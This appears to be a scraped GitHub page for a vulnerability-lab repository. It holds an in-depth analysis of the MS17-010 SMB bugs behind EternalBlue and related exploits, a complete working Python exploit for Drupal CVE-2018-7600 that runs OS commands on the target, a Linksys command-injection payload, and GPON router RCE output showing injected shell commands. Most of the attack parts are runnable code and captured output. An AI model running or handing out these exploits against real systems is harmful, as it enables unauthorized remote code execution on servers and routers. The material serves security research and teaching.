nixawk / labs Goto Github PK
View Code? Open in Web Editor NEWVulnerability Labs for security analysis
labs's People
Contributors
Stargazers
Watchers
Forkers
markart webarmor dylangywu wuudouglas kbahaxor khanhnnvn brennane security-prince thelastbyte cjjduck unixfreaxjp mjain61 ashr lovebair2022 matts-mpg stevenksaint jeperez shaoruicy demonsec666 chris1201 anymaster darkarp chriscoleman241 forbidden-ali suriya73 midnightslacker sasqwatch minh7992 hajdbo afudadi jerusalemsbell olivierh59500 hktalent walterjia ioscarry mgcfish 3wapp serj4nt sanwenkit fbion xzblueidea shekkbuilder herocodemaster hamid-k ghackanonymous notre1 ww9210 kuteminh11 jh0n-0x genihoust seth1002 avrum haitt37 frailleon everping theralfbrown und3fined emadboss tiedanmeimei gczaizi alanjsil l9c donbinhvn mattbushey chigalagua alex-dengx duolaaa lsena-infosec proxyanon lintingfeng wings12345 securityresearchstaff r0cknrolla adolfoeliazat alpah7 rondcast windhl elm0d fb11 readercrap r3zk0n gabirel dragoneeg dexit yeeyh vinsonzou tobey123 yyqs2008 brutes1 thenukebr zk-technology rioald ahmadnourallah ramous 0x13337 coffeehb dnhdang94 cyri1s 0x09al wuyaseclabs's Issues
guide
INFO:main:target: https://auth.westeros.XYZABC.it/
INFO:main:status: 200: Server: nginx
INFO:main:status: 200: Server: nginx
INFO:main:[?] Unknown Vulnerable
unable to find server version guess it has been patched already
[Analysis] MS17_010
Nice Job From: https://github.com/worawit/MS17-010/blob/master/BUG.txt
===============
SMB Transaction
===============
To understand the bugs, we need to understand SMB transaction because most bugs in MS17-010 are related to transation.
I try to make it short.
SMB message structure is well documented in https://msdn.microsoft.com/en-us/library/ee441702.aspx. We might need it
for reference.
As documented in https://msdn.microsoft.com/en-us/library/ee441466.aspx, there are 6 SMB commands for transaction subprotocol.
If a transaction message is larger than SMB message (determined by MaxBufferSize in session parameter), a client
MUST use one or more SMB_COM_*TRANSACT*_SECONDARY command (with same TID, UID, PID and MID in SMB header) to send
transaction message that did not fit in the initial message.
Each SMB transaction command has subcommand codes. There are 3 group of transaction subcommand as documented in
https://msdn.microsoft.com/en-us/library/ee441514.aspx (because SMB_COM_*TRANSACT*_SECONDARY comamnds are needed to
send a large transaction message).
Now, we go through some implementaion detail on Windows SMB transaction.
- A TRANSACTION struct and transaction data buffer are always allocated in 1 buffer. In memory, a TRANSACTION struct
is always followed by data buffer as shown below.
+-----------------+--------------------------------------------+
| TRANSACTION | transaction data buffer |
+-----------------+--------------------------------------------+
- A transaction buffer is paged pool buffer.
- There is lookaside for transaction buffer which size is 0x5000.
- if size <=0x5000, use lookaside
- all buffer size will be 0x5000 (even required buffer size is only 0x100)
- if size >0x5000, directly allocate from paged pool
- if transaction command is SMB_COM_TRANSACTION and SetupCount is 0, directly allocate from paged pool
- TRANSACTION important struct member
- InSetup : The pointer to received setup in transaction data buffer.
- OutSetup : The pointer to reply setup (is set when all transaction data is received and NOT in transaction data buffer).
- InParameters : The pointer to received parameter(s) in transaction data buffer.
- OutParameters : The pointer to reply parameter(s) in transaction data buffer.
- InData : The pointer to received data in transaction data buffer.
- OutData : The pointer to reply data in transaction data buffer.
- SetupCount : The number of setup words that are included in the transaction request.
This one determines InSetup buffer size.
- MaxSetupCount : Maximum number of setup bytes that the client will accept in the transaction reply.
This one determines OutSetup buffer size.
- ParameterCount : The current number of received parameter bytes or the number of parameter to be sent in reply.
- TotalParameterCount : The total number of parameter bytes to be sent in this transaction request.
This one determines InParameters buffer size.
- MaxParameterCount : The maximum number of parameter bytes that the client will accept in the transaction reply.
This one determines OutParameters buffer size.
- DataCount : The current number of received data bytes or the number of data to be sent in reply.
- TotalDataCount : The total number of data bytes to be sent in this transaction request.
This one determines InData buffer size.
- MaxDataCount : The maximum number of data bytes that the client will accept in the transaction reply.
This one determines OutData buffer size.
- Function : The NT transaction subcommand code.
- Tid : The transaction Tid.
- Pid : The transaction Pid.
- Uid : The transaction Uid.
- Mid/Fid : The transaction Mid.
- AllDataReceived : The boolean which set to 1 when (ParameterCount == TotalParamterCount && DataCount == TotalDataCount).
- There are 3 memory layout for InParameters, OutParameters, InData, OutData buffer in transaction data buffer.
- memory layout for SMB_COM_TRANSACTION except TRANS_MAILSLOT_WRITE and "TRANS with zero SetupCount" is shown below.
In* and Out* buffers are overlapped.
+---------------+------------------------------------------------------+
| TRANSACTION | transaction data buffer |
+---------------+------------------------------------------------------+
| InSetup | InParameters | InData | |
+------------------------------------------------------+
| OutParameters | OutData |
+------------------------------------------------------+
- memory layout for SMB_COM_TRANSACTION2 and exception case from above SMB_COM_TRANSACTION is shown below.
All buffers are not overlapped.
+---------------+------------------------------------------------------------------------------+
| TRANSACTION | transaction data buffer |
+---------------+------------------------------------------------------------------------------+
| InSetup | InParameters | InData | OutParameters | OutData |
+------------------------------------------------------------------------------+
- memory layout for SMB_COM_NT_TRANS is shown below. InParameters and OutParameters are overlapped.
InData and OutData are overlapped.
+---------------+-----------------------------------------------------------+
| TRANSACTION | transaction data buffer |
+---------------+-----------------------------------------------------------+
| InSetup | InParameters | InData | |
+---------+----------------------+--------------------------+
| | OutParameters | | OutData |
+-----------------------------------------------------------+
- Transaction is executed when (ParameterCount == TotalParamterCount && DataCount == TotalDataCount).
- While executing transaction, InParameters and InData pointer might be modified.
- After transaction is executed, ParameterCount and DataCount (is normally set in called transaction function) are used
for determining the reply size of OutParameters and OutData respectively.
- A SMB_COM_*_SECONDARY request can be used to overwrite a sent transaction parameters and data with displacement.
ParameterCount and DataCount is added no matter what (valid) displacement value is.
- assume TotalParameterCount is 0 and TotalDataCount is 16
- first transaction request has 8 bytes of data
- secondary transaction request can have 8 bytes of data with displacement 0
- 8 bytes of data in first transaction request is overwritten
- next 8 bytes of data never be written
- For multipiece transaction (transaction that used secondary to complete transaction), a server uses
last SMB_COM_*_SECONDARY command to determine transaction type.
- if last command is SMB_COM_TRANSACTION_SECONDARY, a server executes subcommand as TRANS_*.
- if last command is SMB_COM_TRANSACTION2_SECONDARY, a server executes subcommand as TRANS2_*.
- if last command is SMB_COM_NT_TRANSACT_SECONDARY, a server executes subcommand as NT_TRANSACT_*.
- A transaction is also used in SMB_COM_WRITE_ANDX command (https://msdn.microsoft.com/en-us/library/ee441954.aspx)
when WriteMode is RAW_MODE. The transaction uses FID in parameters instead of MID in SMB header for
matching transaction.
That should be enough for SMB transaction. It's time to start bug details.
Below is bugs I found from MS17-010 diff.
===========
Bug1: Uninitialized transaction InParameters and InData buffer
===========
A transaction data buffer is not initialized. If we send multipiece transaction request with displacement 0,
a server will use uninitialized parameter and data for input. An uninitialized input here is normally useless
because a server processes input parameter and data as untrusted data.
If we found a transaction subcommand that use part of input as output, we could use this bug for
leaking uninitialized data.
A transaction subcommand that perfect for exploiting this bug is NT_TRANSACT_RENAME. The NT_TRANSACT_RENAME
is documented as "Not implemented". But there is a code in SrvSmbNtRename() function.
Here is psuedocode for SrvSmbNtRename()
SrvSmbNtRename()
{
// ParameterCount must be >= 4
// first 2 bytes of InParameters is fid
// verify fid
// if verification failed, return error without data
// if verification success, return success without modifying OutParameters, ParameterCount, OutData, DataCount
}
But, as mentioned above, transaction InData and OutData are overlapped. Without modifying any
transaction *Parameter* and *Data*, a server returns InData (like echo).
An only REQUIREMENT for using NT_TRANSACT_RENAME command is valid fid. So we need to get fid by opening
any named pipe or share first.
This bug is not helpful for exploitation because leaked info is from freed buffer. It is difficult to get
exact information because a transaction size is always >=0x5000.
Here is some useful of this bug:
- detect a target architecture (32 or 64 bit) from leak pointer
- might contain important data
The PoC filename for this bug is infoleak_uninit.py
Note:
- this bug is not used in NSA leak tools.
- because the fix only set zero to InParameters and InData buffer, it is still possible to do information disclosure
from OutParameters and OutData. May17 security patches fix information disclosure from OutParameters and OutData in
various function (no zero the whole OutParameters and OutData buffer).
- May17 security patches modify SrvSmbNtRename() to return an error.
===============
Bug2: TRANS_PEEK_NMPIPE transaction subcommand expects MaxParameterCount to be 16
===============
SrvPeekNamedPipe() is used for handling TRANS_PEEK_NMPIPE subcommand (https://msdn.microsoft.com/en-us/library/ee441845.aspx).
It peeks the named pipe data to OutParameters buffer. The named pipe data is placed at OutParameters+16.
If MaxParameterCount is 16, OutData will point to correct named pipe data. By setting MaxParameterCount larger than 16,
we can leak uninitialized OutData buffer. But we can do better by using it with Bug3.
The fix of this bug is used by scanners to determine if MS17-010 has been patched or not.
SrvAllocationTransaction() is used for allocating a transaction struct and data buffer. If a transaction data buffer size is
greater than 0x10400, the SrvAllocationTransaction() will set a pointer to transaction to NULL. Then, the server replies
an error code 0xC0000205 (STATUS_INSUFF_SERVER_RESOURCES).
When sending a large MaxParameterCount and MaxDataCount (sum of them is >0x10400), we will got an error code 0xC0000205.
Because MS17-010 patch changes MaxParameterCount to 16 if transaction subcommand is TRANS_PEEK_NMPIPE before calling
SrvAllocationTransaction(), SrvPeekNamedPipe() will be called even sum of MaxParameterCount and MaxDataCount is >0x10400.
The response from SrvPeekNamedPipe() is depended on our InSetup.
===============
Bug3: Transaction reply data size might be larger than allocated buffer size
===============
SrvCompleteExecuteTransaction() function is used for sending transaction reply to a client. But it has no check if
ParameterCount/DataCount is larger than MaxParameterCount/MaxDataCount. SrvCompleteExecuteTransaction() might
copy reply data from outside of buffer (OOB read) to client. This can lead to information disclosure.
To exploit the bug, we send a TRANS_PEEK_NMPIPE transaction subcommannd (Bug2) with MaxParameterCount to very large value and
MaxDataCount to 1. If a transaction reply data size (DataCount) is more than MaxDataCount, SrvCompleteExecuteTransaction()
will send OutData and data next to OutData buffer to a client. The transaction buffer should look like below.
+---------------+-----------------------------------------------------+
| TRANSACTION | transaction data buffer |
+---------------+-----------------------------------------------------+
| InSetup | InParameters | InData | |
+-----------------------------------------------------+------------+
| OutParameters |OutData| OOB read |
+-----------------------------------------------------+------------+
The NSA eternalromance uses this bug and Bug2 to do a info disclosure. The PoC file is eternalromance_leak.py.
The bug is fixed in Windows 8 (since release) and later. MS17-010 add the same code as Windows 8 to fix this bug on Windows<8.
NSA eternalromance relies on this bug to leak TRANSACTION struct. So NSA eternalromance cannot exploit Windows 8 and later.
===============
Bug4: Transaction ParameterCount/DataCount might be greater than TotalParameterCount/TotalDataCount
===============
When sending SMB_COM_*_SECONDARY command, a server checks a displacement value and a size of data to not write outside of
allocated buffer. But there is no check if total received ParameterCount/DataCount is greater than
TotalParameterCount/TotalDataCount.
For example:
- a transaction with TotalDataCount=0x20
- first request, send 0x18 bytes of data (DataCount=0x18)
- next request, send 0x10 bytes of data (DataCount=0x28)
Normally, this bug is not useful for exploitation. But it can be used with Bug5 (below).
===============
Bug5: Transaction secondary request is accepted and processed after transaction execution is started
===============
If we send a transaction secondary request to a transaction that AllDataReceived member has already been set, a server will
send back an error without processing the request.
For multipiece transaction, AllDataReceived is set (in SrvSmbTransactionSecondary()/SrvSmbNtTransactionSecondary()) before
executing transaction. But AllDataReceived is NOT set (in SrvSmbTransaction()/SrvSmbNtTransaction()) when transaction is
completed in 1 SMB message. This allow us to send a transaction secondary request to modify InParamter/InData buffer and
ParameterCount/DataCount while server is executing a transaction or sending a reply.
First case to exploit this bug is sending a transaction secondary request while a server is sending a reply. The result is
a server replies data outside of OutData buffer (similar to Bug3). But this method seems to be race condition that diffcult to win.
NSA eternalchampion and eternalsynergy use very nice trick to always win this race condition.
When doing SMB login, we send SMB_COM_SESSION_SETUP_ANDX (https://msdn.microsoft.com/en-us/library/ee442101.aspx) request to
a server. The request contains MaxBufferSize field (https://msdn.microsoft.com/en-us/library/ee441849.aspx) which is
the maximum size, in bytes, of the largest SMB message that the client can receive.
If a transaction reply size is larger than MaxBufferSize, a server will send multiple transaction replies to a client. To resume
sending next transaction reply, a server add work queue to call RestartTransactionResponse() function. Moreover,
RestartTransactionResponse() has no check about MaxParameterCount and MaxDataCount.
With above information, the NSA exploit sends SMB_COM_SESSION_SETUP_ANDX (login) with specific MaxBufferSize. Then, the exploit
creates one complete NT_TRANS_RENAME request which response size is larger than MaxBufferSize and one NT_TRANS_RENAME
secondary request, with a number of data is a number of byte to leak. Finally, the exploit sends these 2 requests in 1 TCP packet.
After a server sends first part of transaction reply, a server queue a call to RestartTransactionResponse() after NT_TRANS_RENAME
secondary request. The transaction DataCount is increased when processing the NT_TRANS_RENAME secondary request (this works
because of Bug4). Then, the server sends second part of transaction reply with data outside of OutData buffer.
We can see PoC for leaking information with this bug in eternalchampion_leak.py and eternalsynergy_leak.py. I do not know why
both exploits use different parameters.
Another case to exploit this bug is sending a transaction secondary request while a server is executing a transaction. This case
is very difficult to find a exploit path and requires to win a race (champion). The NSA eternalchampion uses
TRANS2_QUERY_PATH_INFORMATION subcommand (https://msdn.microsoft.com/en-us/library/ee441634.aspx) with
SMB_INFO_IS_NAME_VALID query information level (https://msdn.microsoft.com/en-us/library/ff470079.aspx).
In SrvSmbQueryPathInformation() function with SMB_INFO_IS_NAME_VALID information level, the transaction InData pointer is
modified to point to UNICODE_STRING struct allocated on stack. After modified InData pointer, if a server processes a transaction
secondary request before executing transaction is finished, the stack data (saved eip/rip) will be overwritten with certain offset
by data and dataDisplacement in transaction secondary. Because offset in stack is always fixed, NSA eternalchampion has no
chance to crash a target.
The PoC file for this bug is eternalchampion_poc.py
Note: I found the same fix for this bug in SrvSmbWriteAndX() too
===============
Bug6: Transaction secondary can be used with any transaction type
===============
Normally SMB_COM_TRANSACTION command must be followed by SMB_COM_TRANSACTION_SECONDARY command, SMB_COM_TRANSACTION2 command must be
followed by SMB_COM_TRANSACTION2_SECONDARY command and SMB_COM_NT_TRANS command must be followed by SMB_COM_NT_TRANS_SECONDARY
command if transaction data in first SMB message is not complete. But a server has no check. So we can send any transaction
secondary command (which matches TID, UID, PID and MID) to complete a transaction.
Do not forget that a server uses last SMB_COM_*_SECONDARY command to determine transaction type. So we can turn any transaction type
to be SMB_COM_TRANSACTION or SMB_COM_TRANSACTION2. We cannot turn non SMB_COM_NT_TRANS to SMB_COM_NT_TRANS because SMB_COM_NT_TRANS
uses Function to determine transaction subcommand.
This bug is used in NSA eternalblue exploit for sending large transaction data (>=0x10000 bytes) for TRANS2_OPEN2. Because only
SMB_COM_NT_TRANS request use 4 bytes for TotalDataCount field (other use 2 bytes), the exploit have to start a transaction with
SMB_COM_NT_TRANS command then following the SMB_COM_TRANSACTION2_SECONDARY command.
You can see an example usage in eternalblue_poc.py.
As I mentioned in introduction section, a transaction is also used in SMB_COM_WRITE_ANDX command when WriteMode is RAW_MODE.
This is very interesting case because SrvSmbWriteAndX() writes data to transacation with below code.
memmove(transaction->Indata, request->data, request->dataLength);
transaction->InData += request->dataLength; // shift InData pointer
transaction->DataCount += request->dataLength;
Notice that SrvSmbWriteAndX() shifts InData pointer when writing data, while transaction secondary uses dataDisplacement to set
where to write a data in InData buffer (without moving InData).
Assume we start a transaction with TotalDataSize=0x2000 with MID value same as FID of open named pipe. The memory layout look
like below (I omit OutParameters and OutData because they are not related).
+---------------+-----------------------------------------------------+
| TRANSACTION | transaction data buffer |
+---------------+-----------------------------------------------------+
| InSetup | InParameters | InData |
+-----------------------------------------------------+
Then, we send a SMB_COM_WRITE_ANDX command with WriteMode=RAW_MODE and 0x100 bytes of data.
+---------------+-----------------------------------------------------+
| TRANSACTION | transaction data buffer |
+---------------+-----------------------------------------------------+
| InSetup | InParameters | | InData |
+-----------------------------------------------------+
Then, writing outside transaction data buffer is possible if we send a transaction secondary command with dataDisplacement=0x1f??.
This OOB write is very good for exploitation however SMB_COM_WRITE_ANDX command with RAW_MODE write requires a valid named pipe fid.
Since Windows Vista, the default Windows configuration without additional service does not allow an anonymous logon (NULL session)
to access any named pipe.
You can see PoC in eternalromance_poc.py and eternalsynergy_poc.py (with large paged groom method to show another heap spraying method).
Note: NSA eternalromance and eternalsynergy use this bug for OOB write. Eternalromance uses Bug3 for leaking transaction struct
(which is limited to Windows<8) but eternalsynergy uses Bug5 for leaking transaction struct and some trick to find
a NonPagedPoolExecute page (I do not check how exploit exactly work) in Windows 8 and Windows 2012.
===============
Bug7: Wrong type assigment in SrvOs2FeaListSizeToNt()
===============
The FEA (Full Extended Attribute), https://msdn.microsoft.com/en-us/library/ee915515.aspx, is used in SMB_COM_TRANSACTION2 subcommands.
Normally we need to send FEA_LIST (https://msdn.microsoft.com/en-us/library/ff359296.aspx) in SMB_COM_TRANSACTION2 subcommands request.
When processing SMB_COM_TRANSACTION2 subcommands request wth FEA_LIST, Windows need to convert FEA_LIST to a list of
FILE_FULL_EA_INFORMATION (https://msdn.microsoft.com/en-us/library/cc232069.aspx).
There is a bug while converting FEA_LIST to FILE_FULL_EA_INFORMATION if FEA_LIST.SizeOfListInBytes is >=0x10000. The SrvOs2FeaListToNt()
is used for converting which has following psuedocode.
SrvOs2FeaListToNt()
{
outputLen = SrvOs2FeaListSizeToNt(feaList);
output = SrvAllocateNonPagedPool(outputLen);
// start copy all FEA data to output in a list of FILE_FULL_EA_INFORMATION format
}
SrvOs2FeaListSizeToNt(feaList)
{
outputLen = 0;
foreach (fea in feaList) {
if (IsFeaDataOutOfBound(fea, feaList)) {
// shrink feaList.SizeOfListInBytes to only valid fea so copy step does not need to check again.
// feaList.SizeOfListInBytes is DWORD but it is cast to WORD so HIDWORD is not modified.
(WORD) feaList.SizeOfListInBytes = Pos(fea) - Pos(feaList);
return outputLen;
}
outputLen += GetNtLengthForFea(fea);
}
return outputLen;
}
From above pseudocode, if we send feaList.SizeOfListInBytes=0x10000 while valid FEA entries in list is less than
0x10000 bytes (assume 0x4000), the feaList.SizeOfListInBytes will be modified to 0x14000 because HIDWORD is not modified and
outputLen is only 0x4000. Then the output buffer will be overflowed while copying FEA data to output buffer.
As mentioned above, we need to send a transaction data that larger than 0x10000 bytes. But the FEA_LIST data is used
only in SMB_COM_TRANSACTION2 which TotalDataCount is USHORT (max is 0xffff). So we need to Bug6 to send a FEA_LIST
data that larger than 0x10000.
The exploit path that required minimum condition is TRANS2_OPEN2 subcommand. The SrvSmbOpen2() calls SrvOs2FeaListToNt()
for converting FEA_LIST before any permission checking. So a client just need to access any share (IPC$ is best choice)
and able to send SMB_COM_NT_TRANS and SMB_COM_TRANSACTION2_SECONDARY commands.
Above exploitation requirements are good for Windows<8 because Windows<8 always allow anonymous (NULL session) to
access IPC$ and send transaction commands. However, Windows>=8 does not allow anonymous to access IPC$ by default
(IPC$ might be acessible but most of transaction commands cannot be used).
You can see PoC in eternalblue_poc.py
===============
Bug8: Wrong type assigment in SrvOs2GeaListSizeToNt()
===============
The bug is same as Bug7 in different function but all exploit path requires valid fid.
===============
Bug9: SESSION_SETUP_AND_X request format confusion
===============
This bug is not fixed in MS17-010. I put it here because NSA leak tools use it for exploitation. The bug itself
can only fool a server to allocate a large nonpaged pool (<0x20000) for storing small client information.
There are 2 format of SMB_COM_SESSION_SETUP_ANDX request for "NT LM 0.12" dialect. The first format is documented
in https://msdn.microsoft.com/en-us/library/ee441849.aspx. It is used for LM and NTLM authentication. Another format
is documented in https://msdn.microsoft.com/en-us/library/cc246328.aspx. It is used for NTLMv2 (NTLM SSP) authentication.
We noted that these 2 foramts have different WordCount (first one is 13 and later is 12).
The SMB_COM_SESSION_SETUP_ANDX request is handled by BlockingSessionSetupAndX() function. Below is psuedocode for hanlding
both request format (only related part).
BlockingSessionSetupAndX()
{
// ...
// check word count
if (! (request->WordCount == 13 || (request->WordCount == 12 && (request->Capablilities & CAP_EXTENDED_SECURITY))) ) {
// error and return
}
// ...
if ((request->Capablilities & CAP_EXTENDED_SECURITY) && (smbHeader->Flags2 & FLAGS2_EXTENDED_SECURITY)) {
// this request is Extend Security request
GetExtendSecurityParameters(); // extract parameters and data to variables
SrvValidateSecurityBuffer(); // do authentication
}
else {
// this request is NT Security request
GetNtSecurityParameters(); // extract parameters and data to variables
SrvValidateUser(); // do authentication
}
// ...
}
From psuedocode above, if we send SMB_COM_SESSION_SETUP_ANDX request as Extended Security (WordCount 12) with
CAP_EXTENDED_SECURITY but no FLAGS2_EXTENDED_SECURITY, the request will be processed as NT Security request (WordCount 13).
We can also send the request as NT Security request (WordCount 13) with CAP_EXTENDED_SECURITY and FLAGS2_EXTENDED_SECURITY.
But later case is no use because there is an extra check of ByteCount value in GetExtendSecurityParameters() function.
Normally a server validates WordCount and ByteCount field in SrvValidateSmb() function before passing a request to
request handler. The WordCount*2 and ByteCount must not be larger than received data size. With the confusing bug, a server
read ByteCount from wrong offset while extracting parameters and data to variables.
The bug does not cause any memory corruption or information disclosure because ByteCount value is only used for calculating
buffer size for storing NativeOS and NativeLanMan unicode string (UTF16). The NativeOS and NativeLanMan size is caculated from
"ByteCount - other_data_size". The buffer for NativeOS and NativeLanMan unicode string is allocated on nonpaged pool.
NSA eternalchampion uses this bug to set UNICODE_STRING.MaximumLength to 0x15ff and place staging shellcode in buffer because
nonpaged pool is executable on Windows<8.
Note: On x86, 'ff15????????' is 'call [????????]' instruction. On x64, 'ff1500000000' is 'call [rip+0]'.
NSA eternalblue uses this bug to creating hole because we can control when to allocate and free the buffer.
The PoC filename for this bug is npp_control.py and the example usages of this bug is eternalblue_exploit.py and eternalchampion_poc2.py
Note: This mothod cannot use for user authentication if NTLM authentication is disabled
References
[Exploit] CVE-2018-7600 - drupal: Unsanitized requests allow remote attackers to execute arbitrary code
Description
Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
Exploit
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# CVE-2018-7600
# Drupal: Unsanitized requests allow remote attackers to execute arbitrary code
"""Tested against Drupal 8.4.5
$ wget -c https://ftp.drupal.org/files/projects/drupal-8.4.5.tar.gz
$ setup Apache2 + Mysql + Drupal
$ python exploit-CVE-2018-7600.py http://192.168.1.19 "pwd"
/var/www/html
----
POST /user/register?element_parents=account%2Fmail%2F%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 144
Content-Type: application/x-www-form-urlencoded
form_id=user_register_form&_drupal_ajax=1&mail%5B%23type%5D=markup&mail%5B%23post_render%5D%5B%5D=exec&mail%5B%23markup%5D=printf admin | md5sum
HTTP/1.1 200 OK
Date: Fri, 13 Apr 2018 05:19:28 GMT
Server: Apache/2.4.29 (Debian)
Cache-Control: must-revalidate, no-cache, private
X-UA-Compatible: IE=edge
Content-language: en
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Expires: Sun, 19 Nov 1978 05:00:00 GMT
X-Generator: Drupal 8 (https://www.drupal.org)
X-Drupal-Ajax-Token: 1
Content-Length: 191
Connection: close
Content-Type: application/json
[{"command":"insert","method":"replaceWith","selector":null,"data":"21232f297a57a5a743894a0e4a801fc3 -\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}]
"""
# sudo pip install requests
from __future__ import print_function
__all__ = ['exploit']
__author__ = [
'a2u', # module developer
'Nixawk' # module Improved
]
import sys
import requests
def send_http_payload(drupal_home_url, php_func, php_func_param):
"""Exploit CVE-2018-7600 drupal: Unsanitized requests
allow remote attackers to execute arbitrary code
"""
params = {
'element_parents': 'account/mail/#value',
'ajax_form': 1,
'_wrapper_format': 'drupal_ajax'
}
payload = {
'form_id': 'user_register_form',
'_drupal_ajax': '1',
'mail[#type]': 'markup',
'mail[#post_render][]': php_func,
'mail[#markup]': php_func_param
}
# Clean URLs - Enabled
url = requests.compat.urljoin(drupal_home_url, '/user/register')
return requests.post(
url,
params=params,
data=payload
)
def check(drupal_home_url):
"""Check if the target is vulnerable to CVE-2018-7600.
"""
status = False
randflag = 'CVE-2018-7600'
vulnflag = randflag + '[{"command":"insert"'
response = send_http_payload(drupal_home_url, 'printf', randflag)
if response and response.status_code == 200 and randflag in response.text:
print("[*] %s is vulnerable" % drupal_home_url)
status = True
else:
print("[?] %s is unknown" % drupal_home_url)
return status
def exploit(drupal_home_url, php_exec_func='passthru', command='whoami'):
"""Execute os command.
"""
response = send_http_payload(drupal_home_url, php_exec_func, command)
if '[{"command":"insert"' in response.text:
command_output, _ = response.text.split('[{"command":"insert"')
print(command_output)
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: python %s <drupal-home-url> <cmd>" % sys.argv[0])
sys.exit(0)
exploit(sys.argv[1], command=sys.argv[2])
References
- https://research.checkpoint.com/uncovering-drupalgeddon-2/
- https://nvd.nist.gov/vuln/detail/CVE-2018-7600
- http://www.securityfocus.com/bid/103534
- http://www.securitytracker.com/id/1040598
- https://blog.appsecco.com/remote-code-execution-with-drupal-core-sa-core-2018-002-95e6ecc0c714
- https://github.com/a2u/CVE-2018-7600
- https://github.com/g0rx/CVE-2018-7600-Drupal-RCE
- https://greysec.net/showthread.php?tid=2912&pid=10561
- https://groups.drupal.org/security/faq-2018-002
- https://lists.debian.org/debian-lts-announce/2018/03/msg00028.html
- https://twitter.com/arancaytar/status/979090719003627521
- https://twitter.com/RicterZ/status/979567469726613504
- https://www.debian.org/security/2018/dsa-4156
- https://www.drupal.org/sa-core-2018-002
- https://www.synology.com/support/security/Synology_SA_18_17
- https://www.tenable.com/blog/critical-drupal-core-vulnerability-what-you-need-to-know
- https://gist.github.com/AlbinoDrought/626c07ee96bae21cb174003c9c710384
- http://php.net/manual/en/function.call-user-func.php
- http://php.net/manual/en/indexes.functions.php
CVE-2017-0199
it does not seems to work or do anything, please what is the proper way of generating the .doc
[Exploit] CVE-2017-17411 - Linksys WVBR0 25 Command Injection
Command Injection
echo "xxx.xxx.xxx.xxxUSER-AGENT" | md5sum
- xxx.xxx.xxx.xxx is your ip.
- USER-AGENT can be a command injection @string.
Send a http request with an command injection payload user-agent.
References
[Exploit] CVE-2017-8570
[Exploit] CVE-2018-10562 GPON Home Routers RCE
$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /"
INFO:__main__:sending payload: 127.0.0.1;`echo BGgw;ls /;echo BGgw`;
diag_result = "ping -c 4 -s 64 127.0.0.1;BGgw
bin
boot
bootimg
dev
etc
home
include
initrd
lib
linuxrc
man
mnt
opt
proc
root
sbin
sys
tmp
uImage
usr
var
web
BGgw;
$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /bin/"
INFO:__main__:sending payload: 127.0.0.1;`echo BMXr;ls /bin/;echo BMXr`;
diag_result = "ping -c 4 -s 64 127.0.0.1;BMXr
Console
EthMgr
GponCLI
GponSLID
LogMgr
MecMgr
MiscMgr
NetMgr
PonMgr
Ssp
TimerMgr
VmrMgr
WebMgr
ash
brctl
busybox
cat
catv
chgrp
chmod
chown
conntrack
cp
date
dd
df
dmesg
dnsmasq
dropbear
dsp
echo
egrep
false
fgrep
grep
gunzip
gzip
hostname
ip
ipaddr
iplink
iproute
iprule
iptables
iptables-restore
iptables-save
iptables-xml
iptunnel
kill
ln
ls
lsof
lspci
mReport
mkdir
mknod
mktemp
mount
mountpoint
mv
netstat
nice
ntpclient
pidof
ping
printenv
ps
pure-ftpd
pwd
rm
rmdir
sed
sh
sleep
stat
stty
sync
tar
tc
telnetd
touch
tr069Mgr
true
ttcp
umount
uname
usleep
vi
zcat
BMXr;
";
$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /sbin/"
INFO:__main__:sending payload: 127.0.0.1;`echo rXVS;ls /sbin/;echo rXVS`;
diag_result = "ping -c 4 -s 64 127.0.0.1;rXVS
arp
ath_wifi.sh
ath_wifi_aquila.sh
ez-ipupdate
fget
format
gdbnfs
halt
hostapd
ifconfig
ifrename
init
insmod
iwconfig
iwevent
iwgetid
iwlist
iwpriv
iwspy
logread
lsmod
memshow
modprobe
nbtscan
nfsstart
ntfs-3g
poweroff
pppd
pppoe
pppoe-config
pppoe-connect
pppoe-stop
reboot
repeater_pass_configuration
rg_setup.sh
rmmod
route
scsi_id
setup.sh
sysctl
syslogd
udev
udev_volume_id
udevd
udevsend
udevstart
udhcpc
upnpd
vconfig
wifi_cb
wifi_test
wlanconfig
wpatalk
rXVS;
$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ps"
INFO:__main__:sending payload: 127.0.0.1;`echo TFGQ;ps;echo TFGQ`;
diag_result = "ping -c 4 -s 64 127.0.0.1;TFGQ
PID Uid VSZ Stat Command
1 root 1136 S init
2 root SWN [ksoftirqd/0]
3 root SW< [events/0]
4 root SW< [khelper]
5 root SW< [kthread]
20 root SW< [kblockd/0]
23 root SW< [khubd]
40 root SW [pdflush]
41 root SW [pdflush]
42 root SW< [kswapd0]
43 root SW< [aio/0]
79 root SW [mtdblockd]
183 root SWN [jffs2_gcd_mtd1]
187 root 1132 S syslogd
193 root 724 S < udevd
407 root SW< [voshwtimer/0]
470 root 2116 S /bin/GponCLI
473 root 1808 S /bin/telnetd
476 root 1288 S /bin/dropbear
477 root 2116 S /bin/GponCLI --script
478 root 2116 S /bin/GponCLI --hook
479 root 1832 S Ssp
480 root 1832 S Ssp
481 root 1832 S < Ssp
482 root 1856 S < /bin/TimerMgr -p 10 -s 0
483 root 1856 S < /bin/TimerMgr -p 10 -s 0
484 root 1856 S < /bin/TimerMgr -p 10 -s 0
485 root 2836 S /bin/LogMgr -p 20 -s 0
486 root 2300 S /bin/MiscMgr -p 20 -s 0
496 root 3624 S /bin/PonMgr -p 20 -s 0
497 root 2308 S /bin/NetMgr -p 20 -s 0
550 root 3604 S < /bin/VmrMgr -p 10 -s 0
551 root 3604 S < /bin/VmrMgr -p 10 -s 0
552 root 3604 S < /bin/VmrMgr -p 10 -s 0
553 root 3968 S /bin/EthMgr -p 20 -s 0
554 root 6360 S /bin/tr069Mgr -p 20 -s 0
